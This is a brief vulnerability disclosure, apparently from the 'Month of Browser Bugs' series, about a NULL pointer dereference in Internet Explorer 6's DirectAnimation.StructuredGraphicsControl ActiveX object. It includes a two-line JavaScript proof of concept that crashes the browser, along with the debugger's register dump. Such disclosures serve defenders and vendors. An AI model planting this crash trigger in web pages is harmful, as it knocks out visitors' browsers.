MoBB #6: StructuredGraphicsControl SourceURL
The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. This bug appears to be triggered by a call to URLOpenBlockingStream() with a NULL pointer referenced by the ppStream argument. The only way I found to trigger this bug is by creating the object through the ActiveXObject interface -- using the standard object/classid syntax (as described here) does not result in a crash.
var a = new ActiveXObject('DirectAnimation.StructuredGraphicsControl');
a.sourceURL = 'CrashingBecauseStreamPtrNotInitialized';
eax=00000000 ebx=7726d35c ecx=02481f30
edx=0013b1a4 esi=00000000 edi=00000000
eip=772ba3bc esp=0013b18c ebp=0013b1b8
772ba3bc 8b08 mov ecx,[eax] ds:0023:00000000=????????
This bug was reported to Microsoft on March 6th, 2006.
This bug will be added to the OSVDB:
Microsoft IE DirectAnimation.StructuredGraphicsControl SourceURL NULL Dereference